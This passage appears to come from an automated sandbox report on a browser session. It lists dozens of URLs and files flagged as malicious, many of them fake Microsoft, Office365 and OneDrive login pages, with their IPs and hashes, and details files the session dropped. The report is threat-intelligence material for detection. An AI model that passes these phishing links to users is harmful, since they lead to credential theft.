www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa

Get hash malicious Browse

https://mofainriao837zaopzxoas.appspot.com/bbvx/ Get hash malicious Browse


https://943d.app.link/ Get hash malicious Browse

Domains

Match Associated Sample Name / URL SHA 256 Detection Link Context

aa-hip-prod.southcentralus.cloudapp.azure.com

#43409.htm Get hash malicious Browse 104.215.74.84

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse 104.215.74.84

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse 104.215.74.84

https://exchange3564.xyz/.d/?email Get hash malicious Browse 104.215.74.84

Skype Business VM.pdf Get hash malicious Browse 104.215.74.84

https://u10269907.ct.sendgrid.net/wf/click?upn=7TnevfDNdxZp2Q3ysQ7X3oESB0-2FDPAHHGrCSuhANFl0RiIaXTQqc14zMc-2FpX9M8w_fxDop4UK-2FXWtvz-2Fo4SgBilCRDsINTKa-2BV6WoX7TCamBzN4Y3OFVxfYIFnMjo2oF0yanJFKyei-2FKbXVFZy2wWdw2BISVfQ0uuj040ducQ3e4x0ReqX-2BeavUyA3qBOBoptIxux6KHZnY0imx8tUJ6aPUBf7V4AQsKN3qI-2FJUs5ka5TGYo3JtEVvh56ieL-2BftMts8GVieoN5pgiQgMOSfl-2FS3as8UhjMRUwml-2Btsxw6bkw-3D

Get hash malicious Browse 104.215.74.84

86741.com/image/index.html Get hash malicious Browse 104.215.74.84

https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html

Get hash malicious Browse 104.215.74.84

hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html

Get hash malicious Browse 104.215.74.84

https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/

Get hash malicious Browse 104.215.74.84

https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D

Get hash malicious Browse 104.215.74.84

https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&[email protected]

Get hash malicious Browse 104.215.74.84

parsintelligent.com/layouts/joomla/content/OFFICE01/office.htm

Get hash malicious Browse 104.215.74.84

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse 104.215.74.84

https://xoaoomoaiaopeamoznoiaib.appspot.com/bdsa/ Get hash malicious Browse 104.215.74.84


email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse 104.215.74.84

https://similarities.ga/aim/redirect.php Get hash malicious Browse 104.215.74.84

www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa

Get hash malicious Browse 104.215.74.84

https://mofainriao837zaopzxoas.appspot.com/bbvx/ Get hash malicious Browse 104.215.74.84

https://943d.app.link/ Get hash malicious Browse 104.215.74.84

cs1227.wpc.alphacdn.net Skype Business VM.pdf Get hash malicious Browse 192.229.221.185

https://jglshop.com.br/?y=ZGFtaWVuY0BhdXN0cmFsaWFuYmFsbGV0LmNvbS5hdQ==&data=02|01|[email protected]|0ada4032a36546c6d13b08d6ac0f8494|363ab79152b7474a91175bf36bde2b94|0|0|636885580035963490&sdata=+0eEs7qSCBrK5wHALHN4ZON9LKqFQEk8Liayanza9jQ=&reserved=0

Get hash malicious Browse 192.229.221.185

New Seccure File 7.24.05 PM.xlsx Get hash malicious Browse 192.229.221.185

https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html

Get hash malicious Browse 192.229.221.185

Ceisa Semo Proposal.pdf Get hash malicious Browse 192.229.221.185

hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html

Get hash malicious Browse 192.229.221.185

https://1drv.ms/b/s!Ai3YLFZQP4zmgnQbLlTwyMGNlcOa Get hash malicious Browse 192.229.221.185

https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/

Get hash malicious Browse 192.229.221.185

https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D

Get hash malicious Browse 192.229.221.185

https://1drv.ms/b/s!AhJu8bKGuybLclKouKsoIXrGDx8 Get hash malicious Browse 192.229.221.185

https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&[email protected]

Get hash malicious Browse 192.229.221.185

login.live.com.office.flagstarbancorp.myshn.net Get hash malicious Browse 192.229.221.185

https://aus01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fonedrive.live.com%2Fredir%3Fresid%3D429413BE603FA343!5758%26authkey%3D!ABt3LPTU6MynWOk%26ithint%3Dfile%252cdocx&data=02%7C01%7Cdamienc%40australianballet.com.au%7Cf3dff5c1c69746509e0c08d6ef0bf767%7C363ab79152b7474a91175bf36bde2b94%7C0%7C0%7C636959232091196729&sdata=9I2tuU2dOpmt0o7AgOaq9Wuz9mjMhKAd7LA55pbkQqQ%3D&reserved=0

Get hash malicious Browse 192.229.221.185

https://1drv.ms/b/s!AvO7bN5acODYawc9teh52z5A8HI?e=3T7pcW

Get hash malicious Browse 192.229.221.185

https://outlookloffice365user23k-secondary.z14.web.core.windows.net/d41d8cd98f00b204e9800998ecf8427e89de54095edc1a5eb8c27bdf9c492019/89de54095edc1a5eb8c27bdf9c492019/#[email protected]

Get hash malicious Browse 192.229.221.185

https://onedrive.live.com/?authkey=%21AGoRsXinDPWY5Mc&cid=4694365C78123852&id=4694365C78123852%21134&parId=root&o=OneUp

Get hash malicious Browse 192.229.221.185


www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa

Get hash malicious Browse 192.229.221.185

https://943d.app.link/ Get hash malicious Browse 192.229.221.185

https://protection.office.com/threatexplorer#/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https://onedrive.live.com/?authkey=%21AKOGMaypqRvjuxE&cid=30A2F54D2B9B8460&id=30A2F54D2B9B8460%21170&parId=root&o=OneUp

Get hash malicious Browse 192.229.221.185

CRY INV#98634.htm Get hash malicious Browse 192.229.221.185

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context

unknown request.doc Get hash malicious Browse 192.168.0.44

FERK444259.doc Get hash malicious Browse 192.168.0.44

b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js

Get hash malicious Browse 192.168.0.40

Setup.exe Get hash malicious Browse 192.168.0.40

base64.pdf Get hash malicious Browse 192.168.0.40

file.pdf Get hash malicious Browse 192.168.0.40

Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40

request_08.30.doc Get hash malicious Browse 192.168.0.44

P_2038402.xlsx Get hash malicious Browse 192.168.0.44

48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22

seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40

Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40

QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40

pptxb.pdf Get hash malicious Browse 192.168.0.40

unknown request.doc Get hash malicious Browse 192.168.0.44

FERK444259.doc Get hash malicious Browse 192.168.0.44

b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js

Get hash malicious Browse 192.168.0.40

Setup.exe Get hash malicious Browse 192.168.0.40

base64.pdf Get hash malicious Browse 192.168.0.40

file.pdf Get hash malicious Browse 192.168.0.40

Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40

request_08.30.doc Get hash malicious Browse 192.168.0.44

P_2038402.xlsx Get hash malicious Browse 192.168.0.44

48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22

seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40

Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40

QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40

pptxb.pdf Get hash malicious Browse 192.168.0.40

JA3 Fingerprints

Match Associated Sample Name / URL SHA 256 Detection Link Context

9e10692f1b7f78228b2d4e424db3a98c DOC1212122211111.pdf Get hash malicious Browse 192.229.221.185

https://cardinalhealth.finance/disribution/ Get hash malicious Browse 192.229.221.185

here.skynnovations.com/availible/ Get hash malicious Browse 192.229.221.185

www.bit.ly/[email protected]&&25.63.34.80&&cc0_34k3=safety-cuttingtools.com&[email protected]&NOI8E6JE=safety-cuttingtools.com&[email protected]&&7165&&cc0_34k3=pascal%20martinet&YY0G3FG=safety-cuttingtools.com&[email protected]

Get hash malicious Browse 192.229.221.185

store.zionshope.org Get hash malicious Browse 192.229.221.185


https://ware.in.net/pro/Onedrive/index.php | malicious | 192.229.221.185

Updated SOW.pdf | malicious | 192.229.221.185

www.egtenterprise.com | malicious | 192.229.221.185

https://www.truesyd.com.au/000/Ovvice1/[email protected] | malicious | 192.229.221.185

https://www.truesyd.com.au/000/Ovvice1/[email protected] | malicious | 192.229.221.185

www.zionshope.org | malicious | 192.229.221.185

Invoicepng (1).pdf | malicious | 192.229.221.185

Review.xps | malicious | 192.229.221.185

https://lootart.com/qtext/ | malicious | 192.229.221.185

meadowss.gq | malicious | 192.229.221.185

https://nameserverip.xyz/sgn/D2019HL | malicious | 192.229.221.185

https://orlando.in.net/[email protected] | malicious | 192.229.221.185

https://angleshelf.sharepoint.com/:b:/s/ShapiroMasseyLLC/EZ2wTj09HkpIouJm6biidOwBQ1TN1ia5jLFP6D3lYHu1_Q?e=KJ4ytm | malicious | 192.229.221.185

https://thedevcomp.net/pop/login/index.php | malicious | 192.229.221.185

https://tryanmcv.com/login.php?l=_JeHFUq_VJOXK0QWHtoGYDw1774256418&fid.13InboxLight.aspxn.1774256418&fid.125289964252813InboxLight99642_Product-userid&userid= | malicious | 192.229.221.185

Dropped Files

Match Associated Sample Name / URL SHA 256 Detection Link Context

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Startup

System is w10x64

iexplore.exe (PID: 4576 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4576 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6B3F30D4-A233-11E9-AADA-C25F135D3C65}.dat

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: Microsoft Word Document

Size (bytes): 33368

Entropy (8bit): 1.8703255075059053

Encrypted: false

MD5: 43DA58C7C3881105E3BC3BFAB5B2C624

SHA1: 2E15BB7A248FE3CA5CAC42BC5101F213E8EB7859

SHA-256: 5494620DF4A1B519CA7464D76F85AEE5184CBF3F11E1C4AD2B41166299621F84

SHA-512: 2CD96BC4688AC4ED567213F1A3FE976A0957F6C216296D6BA226C46F0613DA8D5BC2359D37307FCCC411D538D8041B3BE2ADE200B72B8F865F283ABF441A53C2

Malicious: false

Reputation: low


Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: Microsoft Word Document

Size (bytes): 145638

Entropy (8bit): 3.31748929203143

Encrypted: false

MD5: 4D7CCC39C9B6C66E5EA0CA135271B236

SHA1: B9F25CC4339267086213C300302F85BF3C8DFC8A

SHA-256: E912519979650273645805E9CA60866A2DD6A77099CE4D0F1E6AD56ABA363CD0

SHA-512: 61BE585910487D5E2CF545C4DC42533AD53518BBA09091987414C78062733BF9965B65C7F3F01DF1BC253F92B3796A638363B682C565E9FAF8EEA9B496C90E0E

Malicious: false

Reputation: low

Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{73B3FC37-A233-11E9-AADA-C25F135D3C65}.dat

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: Microsoft Word Document

Size (bytes): 16984

Entropy (8bit): 1.5651325608710502

Encrypted: false

MD5: 507D396B22049D5BBE378C29A8E39748

SHA1: E0F898EFD82D39D9DB9936111C1254472625B3A9

SHA-256: 1CA37CF399CD8767708D6D2CF75C4B00E7AB9ED5DF93C2DF06FB2AFDD6D2C8BA

SHA-512: 3A0CB60D89AA66A24D2F1EEF52C2E11961578FF0A392469F5DE4408052CE2F06D9719E5ABF1D60075FF5ACBD8E82361579CA8ED06F6E803BCAFAEB92E4A9C9D3

Malicious: false

Reputation: low

Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 656

Entropy (8bit): 5.092233081919978

Encrypted: false

MD5: F4274E75BC32AACB92BECB9B76F184B8

SHA1: 3F511E721E9C0E483F83E9ED214ED9A32DD826BB

SHA-256: 534162358D123C4CED1C0DCD6C53ED77B63C9433FCAD829AE2CB3FBBECFAB9F7

SHA-512: E91E40E8171F3105EAA3FD587E1530534E59573AD5174AC9ABCDC8111052BBAA595E9853B23FDF92E8B008D35139185BF20E8F7F94FE43EE6EFD2A909134B8E2

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x41ffd10d,0x01d53640</date><accdate>0x41ffd10d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x41ffd10d,0x01d53640</date><accdate>0x42027f75,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 653

Entropy (8bit): 5.1183826834578765

Encrypted: false

MD5: 2C8906B52317C5877F7B4CD2EF6C45BD

SHA1: 88CB1EF93B12075D151DE8801E021A5F5D264B86

SHA-256: D1505E0F23D3E3811FF22FFD5128C88D3356D34053265A3E5BD62EB5767B093E

SHA-512: BC87F02926B97A7894E8C6AE292C2A5014807843D5B6407FE1D28B34BE99A3F3778C0C19B8D9B3F55CAECF92C1612ED4AAAEC02BDED5CB040CB210F332B4E982


Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x41c1ad24,0x01d53640</date><accdate>0x41c1ad24,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x41c1ad24,0x01d53640</date><accdate>0x41d57ed0,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..


C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 662

Entropy (8bit): 5.131340823983181

Encrypted: false

MD5: FAB148AC9F777CB82C1F2103AC509090

SHA1: 562ED02F68D604D153150A226DCD1DCCCA46554D

SHA-256: 26B18FDDDAA96EC66B709B528E0869D9141CC9BDA3072C73F213F6DED945FE9F

SHA-512: 3883F75C7FCEB4385B4093AF71E8FEE650B5CA45D499B975059D186E4AF293F4095FA16B02B8DB2AA6BE726BD3F76DEDA8591785D2DC9B529A6C038D770E53F1

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x42050801,0x01d53640</date><accdate>0x42050801,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x42050801,0x01d53640</date><accdate>0x420791db,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 647

Entropy (8bit): 5.115930101420065

Encrypted: false

MD5: 8B7BA4E727F8ACB8DB64EBF5FB230D25

SHA1: 16A8DF42F8A7FF577C9DFB56A77B1429EB086665

SHA-256: A8850950E052CD17673333599F098320C4D8EEB1136075DA8F88F1683AB643F8

SHA-512: 7C6F139B28A79E7DCB7CDE2BB34B157C0D0BFC6D526AB2C42FF0587694023F17E68603F6F0E3BC7030D191DC7B43ACFE341C20E490126AF011FAF1AEC64D3645

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x41f35f81,0x01d53640</date><accdate>0x41f35f81,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x41f35f81,0x01d53640</date><accdate>0x41f5d4eb,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 656

Entropy (8bit): 5.138443843506685

Encrypted: false

MD5: 4EF2A145D595A6E77BEAAF52BD2FDA7F

SHA1: B7E09DD6CFC440AB67880838928013D6CC30A850

SHA-256: 765CC8F692DA19011048F1EDF07A1B75BADF8A02082229E946B54EDBD785BFD6

SHA-512: 2C78ADFD8074C22D8900F00F46460CAAFAA1EED4BB4F29C5C55AAB14ABA4599A11C53ECCB6E20D5C3B43966D183904B47FDE6C85CF9EE20CE94653CD917C0707

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x420cb48e,0x01d53640</date><accdate>0x420cb48e,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x420cb48e,0x01d53640</date><accdate>0x420f3dc7,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 653

Entropy (8bit): 5.080045270510188


Encrypted: false

MD5: 88632604F69B57E1882790DE6F5CFF7D

SHA1: E2EE8473409C5BD10C670A5EB0483C6BFD0949F3

SHA-256: E34369A12DA43B38E25C838A0865B884120F2B477B71BCA9777DDBCAF403E8ED

SHA-512: C0AE8E7BBE9806200E59D787D777B4C220E5C633E2185FD6CCD43953290E492EC3682A3462421AFA6357ED9426423F44AD07D0E3CAD189EE15C481DAEBBDD9EF

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x41faac6d,0x01d53640</date><accdate>0x41faac6d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x41faac6d,0x01d53640</date><accdate>0x41fd34f6,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..


C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 656

Entropy (8bit): 5.135533928686235

Encrypted: false

MD5: A02B5C2FFC9C50B512240E57C5146E4F

SHA1: 4BB63FDD58AA53851F95AD1DABF0F5B80452D3E9

SHA-256: 598BEB24024D238606506018EF51F26E86FF469EB1D576C26188F8C02302A1A0

SHA-512: 09C2B95C64860C96B3F9576ECBCA20352C3CAD8F5C15BDD73DB55E4C2AB8DFF224BA56733BE86B2638B732036AD8ADC3C4D7174E189AC27549181923464600F9

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x41f84a1b,0x01d53640</date><accdate>0x41f84a1b,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x41f84a1b,0x01d53640</date><accdate>0x41faac6d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 659

Entropy (8bit): 5.104813826095068

Encrypted: false

MD5: 18ADDFA8D7F62F04B4EB84C3A6271BBB

SHA1: 9544908050FEEAA9C7F3201DFD85C12BB11012D6

SHA-256: 421F93153E9B85D8FAD84927D3D0F8E349A4EE01BAC0DC2C95EA5F59E13DC922

SHA-512: AE72741B66FC9C288E4B6767E532FF28B3425401D7732FE87F2D95CF90D74E2933F4E6AAB91CC73DFD521B574D6A1A778DDF8160A1378400A1B8B8554D96D8EE

Malicious: false

Reputation: low

Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x41e17dd5,0x01d53640</date><accdate>0x41e17dd5,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x41e17dd5,0x01d53640</date><accdate>0x41e4063d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 653

Entropy (8bit): 5.090773860921899

Encrypted: false

MD5: 82E65BDA761DB053CD7F5C2538B5D11F

SHA1: 0AEC3A18249F409B25F54553FB091AEECC6370D2

SHA-256: 34174AED141A4AE936CDDEC28DBD5AD06813680642E66D796CCE3B804BF17BAA

SHA-512: E57994CD8D7B343AA7CB9137E927AEFE78DAD17E334208BB869002F6832E2CA7A7F4A0247CD767F1927A99E7DBE5C7AE82CE9A1FD9F08F746F107736B45784E1

Malicious: false

Reputation: low

